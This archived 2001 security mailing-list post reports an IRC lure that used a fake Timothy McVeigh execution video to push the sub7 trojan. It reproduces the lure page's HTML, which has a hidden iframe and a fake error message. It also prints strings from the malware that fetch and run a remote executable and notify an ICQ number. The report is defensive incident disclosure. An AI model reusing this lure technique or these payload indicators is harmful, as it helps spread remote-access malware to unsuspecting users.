-----BEGIN PGP SIGNED MESSAGE----- Courtesy of Incidents List. Forwarded by: Adam Stanley <adamat_private> - -----Forwarded Message----- From: Bradley Chapman <eaglebtcat_private> To: ircat_private Subject: Timothy McVeigh "video" link lures IRC users to install sub7 To whom it may concern: My name is Bradley Chapman, and I am a student at Brigham Young University. Today on the EFNet IRC network, I found a channel called #mcveigh. I suspected that this channel was not set up for the best of intentions. Curious, I joined the room to see what was going on. Almost immediately, I was assaulted with an "on-join" advertisement in the form of a channel notice. The message asked me to visit the following link to view an .AVI movie of Tim McVeigh's execution: http://www.concentric.net/~1horizon/veigh.html The page itself is blank. After about 2 seconds, it forwards to an email link at: http://www.concentric.net/~1horizon/unknown.eml This email link opens up a .tmp file, which does nothing. The webpage now shows a "Connection Timed Out" message in the same web page. I was suspicious when the email hyperlink tried to send me a .TMP file. After examining that web page's HTML code, I determined it was a fake error designed to make people think that the video feed was too busy. (HTML code shown here): ==================== <HTML> <HEAD> </HEAD> <body bgcolor=lack" link=C0C0C0" vlink=808080" alink=FFFFFF" text=8080FF" topmargin="><a name=op"> <BODY bgColor=#ffffff> <iframe src=cid:THE-CID height=0 width=0></iframe> Connection timed out.(Busy server) Please try again later.<BR> // [note: fake message] </BODY> </HTML> ======================== After using a download manager to save the email file directly, I opened it with Outlook Express. I am fully aware of the risks of opening strange emails, but I know better than to actually run the included attachments. There were two files inside - "ATT00013.txt" and "update.exe" . I have thrown away the .txt file, since it was 0 bytes long. I have packed update.exe as a ZIP file and attached it to this email. Since this was obviously an email virus, I wanted to examine it with a hex editor for useful info. Toward the end of the file, I found the following very interesting pieces of information: ================================== %s\%s ie.exe home.earthlink.net /~goldi anstone/ie.exe GET %s HTTP/1.0 Host: %s 119657247 GET /script s/WWPMsg.dll?from=psychward&fromemail=wwwpw&subject=file+downloaded&body=%s +downloaded+and+executed&to=%s wwp.icq.com ================================== As you can see, this program attempts a connection with home.earthlink.net, and accesses the URL "/~goldianstone/ie.exe" . I presume this file would be downloaded and executed on the victim's computer. Also interesting to note is the ICQ # there: 119657247, accompanied by the WWPMsg.dll script reference (which passes the sub7 info to the ICQ #). I contacted the ICQ#, thinking he/she was the owner of the sub7 bots. I did make contact, but the conversation I had was not what I expected: (see attached file "treesnods.txt") =================================== SUMMARY: She (according to her ICQ Info) is getting flooded with ICQ notices from unknown addresses regarding sub7 information. I tried to get her to save the log from these notices, but she admitted she was not very computer-savvy. I tried many different ways of somehow retrieving the information, (netmeeting for supervision, winzip to compress the 2000b folder) but to no avail. I finally gave up and told her that her ICQ log--in which she mentions a large number of sub7 messages--would be sufficient for the email to the ISPs of the offending #mcveigh channel operators. =================================== I then re-entered #mcveigh and proceeded to tell the whole channel what the link was really about. Not more than 15 seconds later, one of the channel operators kick-banned me with the following message: [23:17:23] *** You were kicked from #mcveigh by low (dont be an idiot, thats what the fbi wants you to think) I didn't care; I had all the info I needed anyway. I backscrolled through the status screen and copied the list of #mcveigh users, then did a /whois on the channel operators. Based on their hostmask, I now knew which ISPs I'd send a "nice letter." The third attached file (mcveigh.txt) is the user list and /whois results of just the channel operators. As you'll see, several of them were in these rooms together: #astral_projection, #only.hard.nigs.pimp.and.roll.here, #minnesota, and #aol . I hope this information is helpful in stopping a potential situation, and in possibly disciplining those responsible for it. If treesnods's estimate is accurate--that is, if there are 60-70 sub7-controlled computers just 18 hours after the execution, and that growth rate continues in the aftermath of McVeigh's death--then some websites may be in trouble and should be putting up their shields. I appreciate your time and effort spent on resolving this issue. I apologize for the length of this email, but I felt that all this info was necessary to prove a point. I look foward to hearing from each service provider. Regards, - Brad Chapman Brigham Young University 801-371-4007 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: See http://www.treachery.net/~jdyson/ for current keys. iQCVAwUBOyZATtCClfiU/BIVAQEUXAP+JYjLv/F/J1S+dR3+5WKa4MBIgNgLQLh+ HSyYQ3euz5GqfhgKVY+gg1dQnlMqkiijkKeiNsSf5K07h5fn9s+Rknx7t/J+nHeN 77g+dLb8ypf30LPwQouAdeJQIgIRrCu4Cs4OQzvljpsHNEdmSnZyY8tvoOmtpjRt bPbsqD4Drn4= =SeEZ -----END PGP SIGNATURE----- ISN is hosted by SecurityFocus.com --- To unsubscribe email isn-unsubscribeat_private
This archive was generated by hypermail 2b30 : Wed Jun 13 2001 - 00:19:41 PDT